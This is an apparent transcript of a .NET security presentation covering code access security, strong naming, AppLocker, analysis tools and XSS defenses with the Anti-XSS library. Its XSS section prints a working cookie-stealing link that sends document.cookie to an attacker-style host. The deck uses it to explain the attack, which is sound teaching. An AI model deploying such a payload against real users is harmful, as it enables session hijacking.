.NET Code Security including 4.0 & Tools
Jon C. Arce [email protected]


Post on 24-Dec-2015


Agenda

Available Tools
• .NET Code Access Security
• FxCop
• CAT.NET

.NET Framework Security Features
• Code Access Security
• Role-Based Security
• Cryptography
• Securing ASP.NET Web Applications
• Securing ASP.NET Web Services

.NET Code Access Security (CAS) Policy

Code Access Security (CAS) is the .NET Common Language Runtime (CLR) mechanism for maintaining security based on the identity of code.

You need to sign the code to add EXTERNAL configuration security to the application.

Strong-Named Assemblies

Strong names are
• Unique identifiers (containing a public key)
• Used to digitally sign assemblies

Strong-named assemblies
• Prevent tampering
• Confirm the identity of the assembly's publisher
• Allow side-by-side components

sn -k MyFullKey.snk

Evidence-Based Security

Evidence
• Is assessed when an assembly is loaded
• Is used to determine the permissions for the assembly
• Can include the assembly's:
  • Strong name information
  • URL
  • Zone
  • Authenticode signature

Security Policies (up to .NET 2.0)

Security Entity: Description

Policy:
• Is set by administrators
• Is enforced at runtime
• Simplifies administration
• Contains permissions
• Contains code groups

Code Group:
• Associates similar components
• Is evidence based
• Is linked to permission set(s)

Permission Set:
• Is a set of granted permissions

Permission Sets

Types of Security Checks

Imperative security checks
• Create Permission objects
• Call Permission methods

Declarative security checks
• Use Permission attributes
• Apply to methods or classes

Overriding security checks
• Use the Assert method
• Prevent the stack walk

Security Check Stack Walks

[Diagram: Call Stack (YourAssembly, SomeAssembly, .NET Framework Assembly) and Security System. Labels: Call to ReadFile; Permission Demand; Grant: Execute; Grant: ReadFile; Grant access?; Security exception: Access denied.]

1. An assembly requests access to a method in your assembly

2. Your assembly passes the request to a .NET Framework assembly

3. The security system ensures that all callers in the stack have the required permissions

4. The security system grants access or throws an exception

Permission Requests

• Used by developers to state required permissions
• Implemented by attributes
• Prevents an assembly from loading when minimum permissions are not available

using System.Security.Permissions;

// I will only run if I can call unmanaged code
[assembly: SecurityPermission(SecurityAction.RequestMinimum, UnmanagedCode = true)]

Create a code group

• Control Panel

Specify Membership Condition


Select a permission set

Naming the permission set

Assign permission sets

Setting File I/O permissions

Completing Code Group Creation

Security Policy in the v4 CLR

In previous releases of the .NET Framework, CAS policy applied to all assemblies loaded into an application. The major areas that are seeing updates with the v4 CLR are:

• Security policy
• Security transparency
• APTCA (AllowPartiallyTrustedCallersAttribute)
• Evidence
• AppDomain Managers

http://blogs.msdn.com/shawnfa/archive/2009/05/20/net-4-0-security.aspx

Sandboxing Privileged Code

[Diagram: Partial Trust Web Application -> Wrapper Assembly -> Secured Resource]

• Partial Trust Web Application: Sandboxed Code, <trust level="Medium" originUrl="--"/>
• Wrapper Assembly: Permissions Demanded then Asserted; AllowPartiallyTrustedCallers attribute added; Assembly installed into the global assembly cache
• Secured Resource: Resource Access
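
The wrapper-assembly pattern from the diagram above, which also exercises the declarative, imperative and Assert checks listed under "Types of Security Checks", as an added example (not code from the original slides). It assumes the .NET Framework 2.0-3.5 CAS model and a strong-named assembly installed in the global assembly cache; the namespace, class name and C:\SecuredReports path are hypothetical.

```csharp
using System;
using System.IO;
using System.Security;
using System.Security.Permissions;
using System.Web;   // AspNetHostingPermission (defined in System.dll)

// A strong-named assembly rejects partially trusted callers
// unless it opts in with APTCA.
[assembly: AllowPartiallyTrustedCallers]

namespace Example.Sandboxing            // hypothetical namespace
{
    public static class SecuredReports  // hypothetical wrapper class
    {
        // Hypothetical secured resource that Medium trust code cannot read directly.
        private const string ReportDir = @"C:\SecuredReports";

        // Declarative check: a permission attribute applied to the method.
        // Every caller on the stack must hold at least Medium ASP.NET trust.
        [AspNetHostingPermission(SecurityAction.Demand,
            Level = AspNetHostingPermissionLevel.Medium)]
        public static string Read(string reportName)
        {
            // Validate before asserting: Assert vouches for the callers, so the
            // wrapper must not let them steer the path outside ReportDir.
            if (string.IsNullOrEmpty(reportName) || reportName[0] == '.' ||
                Path.GetFileName(reportName) != reportName)
                throw new ArgumentException("Invalid report name", "reportName");
            string path = Path.Combine(ReportDir, reportName);

            // Imperative check: create a permission object, call its methods.
            // Assert stops the stack walk for this permission at this frame,
            // so the sandboxed callers above are not checked for file access.
            FileIOPermission read =
                new FileIOPermission(FileIOPermissionAccess.Read, path);
            read.Assert();
            try
            {
                return File.ReadAllText(path);
            }
            finally
            {
                // Drop the assertion as soon as the resource access is done.
                CodeAccessPermission.RevertAssert();
            }
        }
    }
}
```

Under the .NET 4 level 2 transparency rules, code in an APTCA assembly is transparent by default, so the asserting method would also need to be marked [SecuritySafeCritical].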

Evidence Types

Evidence: Description

Application directory: The application's installation directory.

Hash: Cryptographic hash such as SHA1.

Publisher: Software publisher signature; that is, the Authenticode signer of the code.

Site: Site of origin, such as http://www.microsoft.com.

Strong name: Cryptographically strong name of the assembly.

URL: URL of origin.

Zone: Zone of origin, such as Internet Zone.

AppDomain Managers

• In .NET, the basic unit of execution is not the process but the Application Domain.
• With AppDomains, multiple applications can run in the same process, thereby sharing the .NET runtime libraries.
• The HostSecurityManager class applies policy and permissions. This technique determines the security for the entire AppDomain at once.

Software Restriction Policy

You can use software restriction policies to identify software and to control its ability to run on your local computer, organizational unit, domain, or site.

• Control the ability of software to run on your system.
• Permit users to run only specific files on multiuser computers.
• Control whether software restriction policies affect all users or just certain users on a computer.
• Prevent an application from running (for example, a virus).

New Software Restriction Policies

1. Sign the application

2. Set the publisher

• Publish -> Options

Windows Application Locker

AppLocker is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization, based on unique identities of files. If you use AppLocker, you can create rules to allow or deny applications from running, for file types such as:

• executable files (.exe and .com)
• scripts (.js, .ps1, .vbs, .cmd, and .bat)
• Windows Installer files (.msi and .msp)
• DLL files (.dll and .ocx)

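Isolated Storage

• Provides a virtual file system
• Allows quotas
• Implements file system isolation based on:
  • Application identity
  • User identity

using System.IO.IsolatedStorage;

// Open the store that is isolated by user and by assembly identity
IsolatedStorageFile isoStore = IsolatedStorageFile.GetUserStoreForAssembly();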

TOOLS TO HELP WITH SECURITY

FxCop

FxCop is a code analysis tool that checks .NET managed code assemblies for conformance to the Microsoft .NET Framework Design Guidelines. It inspects assemblies for more than 200 defects in the following areas:

• Library design
• Globalization
• Naming conventions
• Performance
• Interoperability and portability
• Security
• Usage

FxCop demo

Microsoft Code Analysis Tool .NET

CAT.NET is a static code analysis tool like FxCop, but specially built for managed code and with a strong focus on security vulnerabilities. CAT.NET scans managed code for specific security vulnerabilities like:

• SQL injection
• LDAP injection
• Cross Site Scripting
• XPATH injection
• and many other categories of vulnerabilities.

CAT.NET demo

Cross Site Scripting

XSS stands for Cross Site Scripting. An XSS attack is when an attacker manages to inject JavaScript code, or sometimes other code, into a website, causing it to execute the code. For example, an attacker makes a specially crafted link and sends it to an unsuspecting victim; when the victim clicks the link, a piece of JavaScript code is executed which sends the victim's cookie away to a CGI script.

Cross-site scripting carried out on websites accounted for roughly 80% of all documented security vulnerabilities as of 2007.

XSS Attack!

Send the victim an email with the following HTML:

<A HREF="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<script>document.location.replace('http://freewebhost.com/ph33r/steal.cgi?'+document.cookie);</script>">Check this Article Out!</a>

The user would of course click the link and be led to the CNN news article, but at the same time the attacker would have been able to direct the user towards his specially crafted URL; he now has the user's cookie.

Using the Firefox cookie editor, the attacker copies and pastes the victim's cookie and uses it for himself.

Microsoft Anti-Cross Site Scripting Library V3.0

The Microsoft Anti-Cross Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique, sometimes referred to as the principle of inclusions, to provide protection against XSS attacks.

http://www.microsoft.com/downloads/details.aspx?familyid=051EE83C-5CCF-48ED-8463-02F56A6BFC09&displaylang=en
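
Output encoding with the Anti-XSS library, applied to a page that echoes a query-string value like the `tw` parameter in the link above, as an added example (not code from the original slides). The handler class and the markup it writes are assumptions; AntiXss.HtmlEncode and AntiXss.UrlEncode come from the library's Microsoft.Security.Application namespace.

```csharp
using System.Web;
using Microsoft.Security.Application;   // Anti-XSS V3.0 (AntiXSSLibrary.dll)

// Hypothetical handler for an article page that echoes the "tw" query value.
public class ArticleHandler : IHttpHandler
{
    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext context)
    {
        string tw = context.Request.QueryString["tw"] ?? string.Empty;
        HttpResponse response = context.Response;
        response.ContentType = "text/html";

        // Vulnerable form, kept as a comment: the raw value is written into
        // the page, so markup in ?tw= becomes part of the document.
        //   response.Write("<p>Referrer tag: " + tw + "</p>");

        // HTML body context: every character outside the library's white list
        // of safe characters is written as an entity, so "<script>" is
        // displayed as text instead of being parsed as a tag.
        response.Write("<p>Referrer tag: " + AntiXss.HtmlEncode(tw) + "</p>");

        // URL context: the value is re-used inside a query string, so it is
        // percent-encoded; an HTML encoder would be the wrong choice here.
        response.Write("<a href=\"/article?tw=" + AntiXss.UrlEncode(tw)
            + "\">Permalink</a>");
    }
}
```

The encoder has to match the output context: HtmlEncode for element content, UrlEncode for values placed inside a URL.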

Session Summary

.NET Framework Security Features
• Code Access Security
• Role-Based Security
• Cryptography
• Securing ASP.NET Web Applications
• Securing ASP.NET Web Services

Next Steps

1. Stay informed about security
• Sign up for security bulletins: http://www.microsoft.com/security/security_bulletins/alerts2.asp
• Get the latest Microsoft security guidance: http://www.microsoft.com/security/guidance/

2. Get additional security training
• Find online and in-person training seminars: http://www.microsoft.com/seminar/events/security.mspx
• Find a local CTEC for hands-on training: http://www.microsoft.com/learning/

For More Information

Microsoft Security Site (all audiences): http://www.microsoft.com/security

MSDN Security Site (developers): http://msdn.microsoft.com/security

TechNet Security Site (IT professionals): http://www.microsoft.com/technet/security

Questions and Answers